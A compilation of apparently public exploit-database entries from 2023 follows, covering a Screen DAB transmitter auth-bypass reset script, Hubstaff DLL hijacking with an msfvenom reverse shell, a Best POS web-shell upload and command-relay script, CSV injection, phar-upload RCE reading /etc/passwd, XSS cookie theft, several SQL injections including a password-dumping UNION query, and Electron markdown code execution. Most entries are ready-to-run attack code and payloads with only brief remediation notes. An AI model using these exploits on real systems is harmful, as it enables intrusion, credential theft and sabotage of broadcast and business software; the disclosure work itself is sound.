#!/usr/bin/env python3 # # Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Reset Board Config # Exploit Author: LiquidWorm # # # Vendor: DB Elettronica Telecomunicazioni SpA # Product web page: https://www.screen.it | https://www.dbbroadcast.com # https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/ # Affected version: Firmware: 1.9.3 # Bios firmware: 7.1 (Apr 19 2021) # Gui: 2.46 # FPGA: 169.55 # uc: 6.15 # # Summary: Screen's new radio DAB Transmitter is reaching the highest # technology level in both Digital Signal Processing and RF domain. # SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the # digital adaptive precorrection and configuatio flexibility, the Hot # Swap System technology, the compactness and the smart system design, # the SFT DAB are advanced transmitters. They support standards DAB, # DAB+ and T-DMB and are compatible with major headend brands. # # Desc: The application suffers from a weak session management that can # allow an attacker on the same network to bypass these controls by reusing # the same IP address assigned to the victim user (NAT) and exploit crucial # operations on the device itself. By abusing the IP address property that # is binded to the Session ID, one needs to await for such an established # session and issue unauthorized requests to the vulnerable API to manage # and/or manipulate the affected transmitter. 
# # Tested on: Keil-EWEB/2.1 # MontaVista® Linux® Carrier Grade eXpress (CGX) # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2023-5775 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5775.php # # # 19.03.2023 # import hashlib,datetime########## import requests,colorama######### from colorama import Fore, Style# colorama.init() print(Fore.RED+Style.BRIGHT+ ''' ██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████ ██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██ ██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██ ''' +Style.RESET_ALL) print(Fore.WHITE+Style.BRIGHT+ ''' ZSL and the Producers insist that no one submit any exploits of themselfs or others performing any dangerous activities. We will not open or view them. ''' +Style.RESET_ALL) s=datetime.datetime.now() s=s.strftime('%d.%m.%Y %H:%M:%S') print('Starting API XPL -',s) t=input('Enter transmitter ip: ') e='/system/api/deviceManagement.cgx' print('Calling object: ssbtObj') print('CGX fastcall: deviceManagement::reset') t='http://'+t+e bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8', 'Accept':'application/json, text/plain, */*', 'Accept-Language':'ku-MK,en;q=0.9', 'Accept-Encoding':'gzip, deflate', 'User-Agent':'Dabber--', 'Connection':'close'} j={'ssbtIdx':0, 'ssbtType':'deviceManagement', 'ssbtObj':{ 'reset':'true' } } r=requests.post(t,headers=bh,json=j) if r.status_code==200: print('Done.') else: print('Error') exit(-1)
Screen SFT DAB 600/C - Unauthenticated Information Disclosure (userManager.cgx)
# Exploit Title: Screen SFT DAB 600/C - Unauthenticated Information Disclosure (userManager.cgx) # Exploit Author: LiquidWorm Vendor: DB Elettronica Telecomunicazioni SpA Product web page: https://www.screen.it | https://www.dbbroadcast.com https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/ Affected version: Firmware: 1.9.3 Bios firmware: 7.1 (Apr 19 2021) Gui: 2.46 FPGA: 169.55 uc: 6.15 Summary: Screen's new radio DAB Transmitter is reaching the highest technology level in both Digital Signal Processing and RF domain. SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the digital adaptive precorrection and configuration flexibility, the Hot Swap System technology, the compactness and the smart system design, the SFT DAB are advanced transmitters. They support standards DAB, DAB+ and T-DMB and are compatible with major headend brands. Desc: Screen is affected by an information disclosure vulnerability due to improper access control enforcement. An unauthenticated remote attacker can exploit this via a plain GET request to the userManager.cgx endpoint (shown below) to gain access to sensitive information, including usernames, account types, and the source IP addresses of currently connected sessions. Because the device binds sessions to the client IP address (see ZSL-2023-5771 through ZSL-2023-5775), disclosing the IP of a connected user compounds that session-management weakness. Tested on: Keil-EWEB/2.1 MontaVista® Linux® Carrier Grade eXpress (CGX) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2023-5776 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5776.php 19.03.2023 -- $ curl 'http://SFTDAB/system/api/userManager.cgx' {"ssbtType":"userManager","ssbtIdx":0,"ssbtObj":{"admin":false,"users":[{"user":"testingus","type":"GUEST","connected":false,"info":null},{"user":"joxy","type":"OPERATOR","connected":false,"info":null},{"user":"dude","type":"OPERATOR","connected":true,"info":{"ip":"192.168.178.150","tmo":120}}]}}
-
Hubstaff 1.6.14-61e5e22e - 'wow64log' DLL Search Order Hijacking
#Exploit Title: Hubstaff 1.6.14-61e5e22e - 'wow64log' DLL Search Order Hijacking
#Date: 14/05/2023
#Exploit Author: Ahsan Azad
#Vendor Homepage: https://hubstaff.com/
#Software Link: https://app.hubstaff.com/download
#Version: 1.6.13, 1.6.14
#Tested On: 64-bit operating system, x64-based processor

Description
Hubstaff is an employee work tracker with screenshots, timesheets, billing, in-depth reports, and more. During testing it was found that the system32 directory was missing a DLL library named wow64log.dll that Hubstaff's setup file tried to load during installation. Hence, using Metasploit's msfvenom to create a new wow64log.dll, the tester was able to get a reverse shell locally.

Exploit
1- Generate a DLL named wow64log.dll using the command: msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f dll -o wow64log.dll
2- Place the newly generated DLL in the system32 directory.
3- Start a listener on the attacker's console using: nc -lnvp <port_used_while_generating_DLL>
4- Launch the exe. A reverse shell will be received as: C:\Windows>

Reviewer caveat: step 2 writes into %SystemRoot%\System32, which already requires administrative rights, so these steps do not cross a privilege boundary by themselves — whoever can plant the DLL already controls the machine. wow64log.dll is also the name the WoW64 layer probes for when 32-bit processes start in general, not something specific to Hubstaff, so the finding amounts to "the installer is one more process that will load a planted wow64log.dll" rather than a Hubstaff-specific vulnerability. The shell obtained runs with the privileges of the user who launches the installer.

Attachments (For the understanding of verification team)
1.png - Showing that wow64log.dll was not found by the exe. [image: 1.png]
2.png - Showing how the tester was able to generate a new dll using msfvenom on port 1337. [image: 2.png]
3.png - Showing a reverse connection received on the attacker's console at C:\Windows> by launching the exe. [image: 3.png]
-
Best POS Management System v1.0 - Unauthenticated Remote Code Execution
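# Exploit Title: Best POS Management System v1.0 - Unauthenticated Remote Code Execution
# Google Dork: NA
# Date: 15/5/2023
# Exploit Author: Mesut Cetin
# Vendor Homepage: https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip
# Version: 1.0
# Tested on: Kali Linux
#
# How it works: ajax.php?action=save_settings accepts a multipart upload without
# authentication and stores the "img" part under assets/uploads/ as
# <unix-timestamp>_shell.php.  The script uploads a minimal PHP shell, probes
# candidate file names around the local clock until it finds the stored copy,
# then relays commands to it.
#
# Reviewer changes versus the original PoC:
#  - the file locator walks outward from the local timestamp (t, t+1, t-1, ...)
#    instead of a fixed grid that, within a 1000-second bucket, only covered a
#    few residues mod 20 and therefore missed most real timestamps;
#  - the timestamp comes from time.time() rather than spawning `date` (Linux-only);
#  - the command is URL-encoded, so '&', '#' and spaces reach the shell intact;
#  - every request has a timeout so an unresponsive target cannot hang the tool.
# Caveat: a persistent web shell is left in assets/uploads/ on the target;
# delete it when authorized testing is finished.

import sys
import time

import requests

# Per-request timeout in seconds.
TIMEOUT = 10
# Half-width (seconds) of the window searched around the local clock for the
# uploaded file name; absorbs attacker/target clock skew.
SEARCH_WINDOW = 300
# Pause between probes so the locator does not hammer the target.
PROBE_DELAY = 0.1

# Multipart body carrying the PHP shell as the "img" part.  The other fields
# are filler the save_settings handler expects.  The email value is reproduced
# as published (the page shows it redacted).
data = '''\
-----------------------------49858899034227071432271107689
Content-Disposition: form-data; name="name"

test
-----------------------------49858899034227071432271107689
Content-Disposition: form-data; name="email"

[email protected]
-----------------------------49858899034227071432271107689
Content-Disposition: form-data; name="contact"

9000000000
-----------------------------49858899034227071432271107689
Content-Disposition: form-data; name="about"

test
-----------------------------49858899034227071432271107689
Content-Disposition: form-data; name="img"; filename="shell.php"
Content-Type: application/x-php

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?>
</pre>
</body>
</html>
-----------------------------49858899034227071432271107689--'''


def get_unix_timestamp():
    """Return the current Unix time as an int (whole seconds)."""
    return int(time.time())


def brute_force_timestamp(timestamp_prev, ip):
    """Locate the uploaded shell by probing candidate file names.

    The target stores the upload as assets/uploads/<unix-timestamp>_shell.php.
    Candidates are tried in order of distance from ``timestamp_prev`` (the local
    clock just before the upload), later second first, then earlier, so a
    target with a synchronised clock is found within a handful of requests.

    Returns the shell URL on the first HTTP 200, otherwise None.
    """
    candidates = []
    for delta in range(SEARCH_WINDOW + 1):
        candidates.append(timestamp_prev + delta)
        if delta:
            candidates.append(timestamp_prev - delta)
    total = len(candidates)

    for progress, timestamp in enumerate(candidates, start=1):
        probe = f"http://{ip}/kruxton/assets/uploads/{timestamp}_shell.php"
        print(f"Attempt {progress}/{total}", end="\r")
        try:
            response = requests.get(probe, timeout=TIMEOUT)
        except requests.RequestException as exc:
            print(f"\n\033[91m[-] Request failed: {exc}\033[0m")
            return None
        if response.status_code == 200:
            print(f"\n\033[92m[+] Webshell found: {probe} \033[0m")
            return probe
        time.sleep(PROBE_DELAY)

    print("\n\033[91m[-] Webshell not found\033[0m")
    return None


def extract_output(response_text):
    """Pull the command output out of the shell's <pre>...</pre> block.

    Returns the stripped text between the first <pre> and the first </pre>,
    or None when either tag is missing or they are in the wrong order.
    """
    start_tag = "<pre>"
    end_tag = "</pre>"
    start_index = response_text.find(start_tag)
    end_index = response_text.find(end_tag)
    if start_index == -1 or end_index == -1 or start_index >= end_index:
        return None
    return response_text[start_index + len(start_tag):end_index].strip()


def code_execution(webshell):
    """Interactive loop: read commands from stdin and run them via the shell.

    Stops on the literal command 'exit'.  The command travels as the ``cmd``
    query parameter and is URL-encoded by requests, so shell metacharacters
    are delivered verbatim.
    """
    if not webshell:
        print("\033[91mWebshell URI not provided\033[0m")
        return
    while True:
        command = input("Enter command to execute (or 'exit' to quit): ")
        if command == 'exit':
            break
        try:
            response = requests.get(webshell, params={"cmd": command}, timeout=TIMEOUT)
        except requests.RequestException as exc:
            print(f"\033[91m[-] Request failed: {exc}\033[0m")
            continue
        output = extract_output(response.text)
        if output:
            print("\033[93m[+] Output:\033[0m")
            print(output)
        else:
            print("\033[91m[-] No output received\033[0m")


def main(argv=None):
    """Entry point: upload the shell, locate it, hand over to the command loop."""
    argv = sys.argv if argv is None else argv
    if len(argv) < 2:
        print("\033[91mUsage: %s <IP>\033[0m" % argv[0])
        print("Example: %s 192.168.106.130" % argv[0])
        sys.exit(1)

    ip = argv[1]
    url = f"http://{ip}/kruxton/ajax.php?action=save_settings"
    # Content-Length is deliberately not set by hand; requests computes it from
    # the encoded body, which is also correct for non-ASCII content.
    headers = {
        'Host': f"{ip}",
        'X-Requested-With': 'XMLHttpRequest',
        'Content-Type': 'multipart/form-data; boundary=---------------------------49858899034227071432271107689',
        'Connection': 'close',
    }

    # Sample the clock immediately before the upload: the target names the
    # file with its own time(), which should be close to this value.
    timestamp_prev = get_unix_timestamp()
    try:
        response = requests.post(url, data=data, headers=headers, timeout=TIMEOUT)
    except requests.RequestException as exc:
        print(f"\033[91m[-] Upload request failed: {exc}\033[0m")
        sys.exit(1)

    if response.status_code == 200 and response.text == '1':
        print("[+] Timestamp: %s" % timestamp_prev)
        print("\033[92m[+] Successly uploaded shell! Unauthenticated! \033[0m")
        webshell = brute_force_timestamp(timestamp_prev, ip)
        code_execution(webshell)
    else:
        print("Did not worked")


if __name__ == "__main__":
    main()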
-
Prestashop 8.0.4 - CSV injection
Exploit Title: Prestashop 8.0.4 - CSV injection
Application: prestashop
Version: 8.0.4
Bugs: CSV Injection
Technology: PHP
Vendor URL: https://prestashop.com/
Software Link: https://prestashop.com/prestashop-edition-basic/
Date of found: 14.05.2023
Author: Mirabbas Ağalarov
Tested on: Windows

2. Technical Details & POC
========================================
Step 1. Log in as a (customer) user.
Step 2. Go to My Account, then Information (http://localhost/index.php?controller=identity).
Step 3. Set the email to =calc|a!z|@test.com
Step 4. When an admin exports customers as a CSV file (http://localhost/admin07637b2omxxdbmhikgb/index.php/sell/customers/?_token=mtc1BTvq-Oab2lBdfCaxpOorYraGGVMiTFluJzOpkWI), the CSV injection fires on the admin's computer and the calculator is opened.

payload: =calc|a!z|@test.com

Note: the payload is a DDE-style formula, so it only executes when the exported file is opened in a spreadsheet application that evaluates such cells and — on current Excel builds — after the user accepts the external-content/DDE warnings; it does nothing on the server. The root cause is that the export writes customer-supplied values into cells without neutralising a leading =, +, -, @ (or tab/CR). The usual fix is to prefix such cells with a single quote and quote the field on export.
-
SitemagicCMS 4.4.3 - Remote Code Execution (RCE)
#Exploit Title: SitemagicCMS 4.4.3 Remote Code Execution (RCE)
#Application: SitemagicCMS
#Version: 4.4.3
#Bugs: RCE
#Technology: PHP
#Vendor URL: https://sitemagic.org/Download.html
#Software Link: https://github.com/Jemt/SitemagicCMS
#Date of found: 14-05-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux

2. Technical Details & POC
========================================
steps:
1. Go to Content, then Files.
2. Upload a file named shell.phar whose content is <?php echo system("cat /etc/passwd"); ?>
3. Browse to http://localhost/SitemagicCMS/files/images/shell.phar

payload: <?php echo system("cat /etc/passwd"); ?>

Note: the PoC request below carries a valid session cookie (SMSESSION...) and an SMRequestToken, so this is an authenticated upload by a user who can reach Content → Files; the title's "RCE" is post-authentication. The upload filter accepts the .phar extension and the web server hands .phar to the PHP interpreter, which is why fetching the file from files/images/ executes it. A fix needs both an extension allow-list on upload and a web-server rule that never executes scripts from the upload directory.

Poc request :

POST /SitemagicCMS/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages HTTP/1.1
Host: localhost
Content-Length: 492
Cache-Control: max-age=0
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywPUsZSbtgJ6nAn8W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Referer: http://localhost/SitemagicCMS/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SMSESSION13bc620d275e3705=biljb454ko3ddonj5943p364lf
Connection: close

------WebKitFormBoundarywPUsZSbtgJ6nAn8W
Content-Disposition: form-data; name="SMInputSMFilesUpload"; filename="shell.phar"
Content-Type: application/octet-stream

<?php echo system('cat /etc/passwd'); ?>
------WebKitFormBoundarywPUsZSbtgJ6nAn8W
Content-Disposition: form-data;
name="SMPostBackControl" ------WebKitFormBoundarywPUsZSbtgJ6nAn8W Content-Disposition: form-data; name="SMRequestToken" 60a7a113cf94842a197912273825b421 ------WebKitFormBoundarywPUsZSbtgJ6nAn8W--
-
Webkul Qloapps 1.5.2 - Cross-Site Scripting (XSS)
# Exploit Title: Webkul Qloapps 1.5.2 - Cross-Site Scripting (XSS) # Date: 15 May 2023 # Exploit Author: Astik Rawat (ahrixia) # Vendor Homepage: https://qloapps.com/ # Software Link: https://github.com/webkul/hotelcommerce # Version: 1.5.2 # Tested on: Kali Linux 2022.4 # CVE : CVE-2023-30256 Description: A Cross Site Scripting (XSS) vulnerability exists in Webkul Qloapps which is a free and open-source hotel reservation & online booking system written in PHP and distributed under OSL-3.0 Licence. Steps to exploit: 1) Go to Signin page on the system. 2) There are two parameters which can be exploited via XSS - back - email_create 2.1) Insert your payload in the "back"- GET and POST Request Proof of concept (Poc): The following payload will allow you to execute XSS - Payload (Plain text): xss onfocus=alert(1) autofocus= xss Payload (URL Encoded): xss%20onfocus%3dalert(1)%20autofocus%3d%20xss Full GET Request (back): [http://localhost/hotelcommerce-1.5.2/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(1)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d] 2.2) Insert your payload in the "email_create" - POST Request Only Proof of concept (Poc): The following payload will allow you to execute XSS - Payload (Plain text): xss><img src=a onerror=alert(document.cookie)>xss Payload (URL Encoded): xss%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3exss POST Request (email_create) (POST REQUEST DATA ONLY): [controller=authentication&SubmitCreate=1&ajax=true&email_create=xss%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3exss&back=my-account&token=6c62b773f1b284ac4743871b300a0c4d]
-
eScan Management Console 14.0.1400.2281 - SQL Injection (Authenticated)
# Exploit Title: eScan Management Console 14.0.1400.2281 - SQL Injection (Authenticated)
# Date: 16/05/2023
# Exploit Author: Sahil Ojha
# Vendor Homepage: https://www.escanav.com
# Software Link: https://cl.escanav.com/ewconsole.dll
# Version: 14.0.1400.2281
# Tested on: Windows
# CVE : CVE-2023-31702

Steps to Reproduce / Proof of Concept (POC)
1. Log into the eScan management console with a valid username and password (the author tested as the root user).
2. Navigate to: https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1&cnt=4176
3. Inject the payload into the UsrId parameter to confirm the SQL injection: https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1;WAITFOR DELAY '0:0:5'--&cnt=4176
4. The 5-second delay confirmed that the "UsrId" parameter is vulnerable to SQL injection. Furthermore, it was also possible to dump all the databases and obtain an OS shell on the MS SQL Server using sqlmap.

Note: the payload is a stacked query (`;WAITFOR DELAY ...`), so the backend executes arbitrary additional statements, not merely a modified SELECT; combined with the OS-shell result the author reports, a single authenticated console session is enough to compromise the database host. The author used the root account; whether lower-privileged console accounts reach the same endpoint is not stated. The host shown (cl.escanav.com) is the vendor-hosted console listed under Software Link — substitute your own instance when reproducing.
-
eScan Management Console 14.0.1400.2281 - Cross Site Scripting
# Exploit Title: eScan Management Console 14.0.1400.2281 - Cross Site Scripting # Date: 2023-05-16 # Exploit Author: Sahil Ojha # Vendor Homepage: https://www.escanav.com # Software Link: https://cl.escanav.com/ewconsole.dll # Version: 14.0.1400.2281 # Tested on: Windows # CVE : CVE-2023-31703 *Step of Reproduction/ Proof of Concept(POC)* 1. Login into the eScan Management Console with a valid user credential. 2. Navigate to URL: https://cl.escanav.com/ewconsole/ewconsole.dll/editUserName?usrid=4&from=banner&P= 3. Now, Inject the Cross Site Scripting Payload in "from" parameter as shown below and a valid XSS pop up appeared. https://cl.escanav.com/ewconsole/ewconsole.dll/editUserName?usrid=4&from="><script>alert(document.cookie)</script>banner&P= 4. By exploiting this vulnerability, any arbitrary attacker could have stolen an admin user session cookie to perform account takeover.
-
Affiliate Me Version 5.0.1 - SQL Injection
[#] Exploit Title: Affiliate Me Version 5.0.1 - SQL Injection
[#] Exploit Date: May 16, 2023.
[#] CVSS 3.1: 6.4 (Medium)
[#] CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
[#] Tactic: Initial Access (TA0001)
[#] Technique: Exploit Public-Facing Application (T1190)
[#] Application Name: Affiliate Me
[#] Application Version: 5.0.1
[#] Vendor: https://www.powerstonegh.com/
[#] Author: h4ck3r - Faisal Albuloushi
[#] Contact: [email protected]
[#] Blog: https://www.0wl.tech
[#] Exploit: [path]/admin.php?show=reply&id=[Injected Query]
[#] Example: [path]/admin.php?show=reply&id=-999' Union Select 1,2,3,4,5,6,7,8,9,concat(ID,0x3a,USERNAME,0x3a,PASSWORD),11,12,13,14,15,16 from users-- -
[#] Notes:
- A normal admin can exploit this vulnerability to escalate his privileges to super admin. The example query reads the users table, including the stored PASSWORD column, so the escalation presumably proceeds by recovering a super admin's credentials; whether those are hashed is not stated.
- Because an existing admin login is a precondition, this is post-authentication privilege escalation rather than initial access; the "Initial Access / T1190" labels above overstate the entry point.
-
Gin Markdown Editor v0.7.4 (Electron) - Arbitrary Code Execution
# Exploit Title: Gin Markdown Editor v0.7.4 (Electron) - Arbitrary Code Execution
# Date: 2023-04-24
# Exploit Author: 8bitsec
# CVE: CVE-2023-31873
# Vendor Homepage: https://github.com/mariuskueng/gin
# Software Link: https://github.com/mariuskueng/gin
# Version: 0.7.4
# Tested on: [Mac OS 13]

Release Date:
2023-04-24

Product & Service Introduction:
Javascript Markdown editor for Mac

Technical Details & Description:
A vulnerability was discovered in Gin markdown editor v0.7.4 allowing a user to execute arbitrary code by opening a specially crafted file.

Proof of Concept (PoC):
Arbitrary code execution:
Create a markdown file (.md) in any text editor and write the following payload:

<video><source onerror="alert(require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());">

Opening the file in Gin will auto execute the Calculator application.

Note: the inline event handler reaches Node's require() directly, which indicates the renderer exposes Node integration to the rendered Markdown; any .md file opened in the editor is therefore effectively trusted code. Remediation is the standard Electron hardening (nodeIntegration off, contextIsolation on) plus sanitising raw HTML before rendering.
-
Yank Note v3.52.1 (Electron) - Arbitrary Code Execution
# Exploit Title: Yank Note v3.52.1 (Electron) - Arbitrary Code Execution
# Date: 2023-04-27
# Exploit Author: 8bitsec
# CVE: CVE-2023-31874
# Vendor Homepage: yank-note.com
# Software Link: https://github.com/purocean/yn
# Version: 3.52.1
# Tested on: [Ubuntu 22.04 | Mac OS 13]

Release Date:
2023-04-27

Product & Service Introduction:
A Hackable Markdown Editor for Programmers. Version control, AI completion, mind map, documents encryption, code snippet running, integrated terminal, chart embedding, HTML applets, Reveal.js, plug-in, and macro replacement

Technical Details & Description:
A vulnerability was discovered in Yank Note v3.52.1 allowing a user to execute arbitrary code by opening a specially crafted file.

Proof of Concept (PoC):
Arbitrary code execution:
Create a markdown file (.md) in any text editor and write the following payload.

Mac:
<iframe srcdoc="<img src=x onerror=alert(parent.parent.nodeRequire('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());>')>">

Ubuntu:
<iframe srcdoc="<img src=x onerror=alert(parent.parent.nodeRequire('child_process').execSync('gnome-calculator').toString());>')>">

Opening the file in Yank Note will auto execute the Calculator application.

Note: the payload climbs out of the srcdoc iframe via parent.parent to reach a window that exposes nodeRequire, i.e. the rendered document and the privileged (Node-enabled) frame share an origin, so anything embedded in a note can call into Node. The fix is the usual Electron hardening (Node integration off / contextIsolation on for the renderer that shows untrusted Markdown) and sanitising raw HTML, iframes in particular.
-
LeadPro CRM v1.0 - SQL Injection
# Exploit Title: LeadPro CRM v1.0 - SQL Injection # Date: 2023-05-17 # Exploit Author: Ahmet Ümit BAYRAM # Vendor: https://codecanyon.net/item/leadifly-lead-call-center-crm/43485578 # Demo Site: https://demo.leadifly.in # Tested on: Kali Linux # CVE: N/A ### Request ### GET /api/v1/products?fields=id,xid,name,price,product_type,tax_rate,tax_label,logo,logo_url&filters=name%20lk%20%22%25aa%25%22&order=id%20desc&offset=0&limit=10 HTTP/1.1 Host: localhost Cookie: XSRF-TOKEN=eyJpdiI6Ind6QkVPeUZzKzI3SWlqSnhjQksyK1E9PSIsInZhbHVlIjoiNU1FQzBRR3NJaFFMNXVrOFp6Y3puQjdNT3ZKcSsyYzc0Nllkc1ovbkMzRnJueDZWV1lnZzJ2RmRaZFRobmRRSmUzVFpDS3dhNVhVRS84UXQrd1FrWkFIclR4Z0d3UDk2YjdFS0MxN25aVG5sY2loQjFYVkhrRXdOV2lWM0s4Um4iLCJtYWMiOiI2MjBiMTEwYTY5MWE3YjYyZTRjYmU5MWU0ZTcwZjRmNGI5ZjUxNjZjNjFmMjc1ZDAwOTE1ODM3NzA5YzZkMzQzIiwidGFnIjoiIn0%3D; leadifly_session=eyJpdiI6InYyUzVNWkVhVHVrODI2ZTl0a21SNmc9PSIsInZhbHVlIjoiSzNjeDVxYUJRbHZEOVd3Z2I3N2pWa1VrbHdTUUNNSmF6blFEN2E4Q3l5RjJ5WnUxbTdyaFJJN3dCUWhZRklzd3B2OWN5bkZJTnR0RndndGxyNjdRSUp6b2NBV1JhSHFWb211SllzajFkb3JCQmtqSzJEeU9ENDZDWW1jdnF0VHEiLCJtYWMiOiI1YjI1YTdlNjhkMDg4NTQyOGI0ODI0ODI5ZjliNzE0OWExNGUxMWVjYmY2MjM2Y2YyMmNkNjMzYmMzODYwNzE1IiwidGFnIjoiIn0%3D User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest X-Csrf-Token: kMwvghrsJyPwJ1LGTXnMgMQAtQGA33DzzMYdes6V Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL2RlbW8ubGVhZGlmbHkuaW4vYXBpL3YxL2F1dGgvbG9naW4iLCJpYXQiOjE2ODQzMTk3ODAsImV4cCI6MTY4NDM0MTY4MCwibmJmIjoxNjg0MzE5NzgwLCJqdGkiOiJleGJDV2ZmdWhiWTIzRlNqIiwic3ViIjoiMSIsInBydiI6IjIzYmQ1Yzg5NDlmNjAwYWRiMzllNzAxYzQwMDg3MmRiN2E1OTc2ZjcifQ.0GcDjE6Q3GYg8PUeJQAXtMET6yAjGh1Bj9joRMoqZo8 X-Xsrf-Token: 
eyJpdiI6Ind6QkVPeUZzKzI3SWlqSnhjQksyK1E9PSIsInZhbHVlIjoiNU1FQzBRR3NJaFFMNXVrOFp6Y3puQjdNT3ZKcSsyYzc0Nllkc1ovbkMzRnJueDZWV1lnZzJ2RmRaZFRobmRRSmUzVFpDS3dhNVhVRS84UXQrd1FrWkFIclR4Z0d3UDk2YjdFS0MxN25aVG5sY2loQjFYVkhrRXdOV2lWM0s4Um4iLCJtYWMiOiI2MjBiMTEwYTY5MWE3YjYyZTRjYmU5MWU0ZTcwZjRmNGI5ZjUxNjZjNjFmMjc1ZDAwOTE1ODM3NzA5YzZkMzQzIiwidGFnIjoiIn0=
Referer: https://localhost/admin/product
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

### Parameter & Payloads ###

Parameter: filters (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: fields=id,xid,name,price,product_type,tax_rate,tax_label,logo,logo_url&filters=name lk "%aa%") AND (SELECT 6593 FROM (SELECT(SLEEP(5)))qBNH) AND (8549=8549&order=id desc&offset=0&limit=10

Note: the captured request carries an Authorization: Bearer JWT together with the Laravel session and XSRF cookies, so this injection is reachable only with a valid API login; the tokens shown are the author's own and must be replaced. The filters parameter is a small query grammar (name lk "%aa%" → LIKE) that is rendered into SQL, and the payload closes the generated expression with `")` before appending the SLEEP subquery — the filter values are interpolated into the statement rather than bound, which is the defect to fix.
-
Smart School v1.0 - SQL Injection
# Exploit Title: Smart School v1.0 - SQL Injection
# Date: 2023-05-17
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://codecanyon.net/item/smart-school-school-management-system/19426018
# Demo Site: https://demo.smart-school.in
# Tested on: Kali Linux
# CVE: N/A

### Request ###

POST /course/filterRecords/ HTTP/1.1
Host: localhost
Cookie: ci_session=dd1bqn8ulsiog4vf7fle5hd4k4fklvve
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 136
Origin: https://localhost
Referer: https://localhost/course/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

searchdata%5B0%5D%5Btitle%5D=category&searchdata%5B0%5D%5Bsearchfield%5D=online_courses.category_id&searchdata%5B0%5D%5Bsearchvalue%5D=1

### Parameter & Payloads ###

Parameter: searchdata[0][searchfield] (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: searchdata[0][title]=category&searchdata[0][searchfield]=online_courses.category_id AND (SELECT 7313 FROM (SELECT(SLEEP(5)))mvaR)-- hAHp&searchdata[0][searchvalue]=1

Note: the injected parameter is searchfield, which the application uses as a column reference (online_courses.category_id) — an identifier position, not a value. Identifiers cannot be bound as query parameters, so the fix is to validate searchfield against an allow-list of permitted column names before it reaches the query builder. The request carries a ci_session cookie; whether /course/filterRecords/ is reachable before login is not stated.
-
Stackposts Social Marketing Tool v1.0 - SQL Injection
# Exploit Title: Stackposts Social Marketing Tool v1.0 - SQL Injection
# Date: 2023-05-17
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://codecanyon.net/item/stackposts-social-marketing-tool/21747459
# Demo Site: https://demo.stackposts.com
# Tested on: Kali Linux
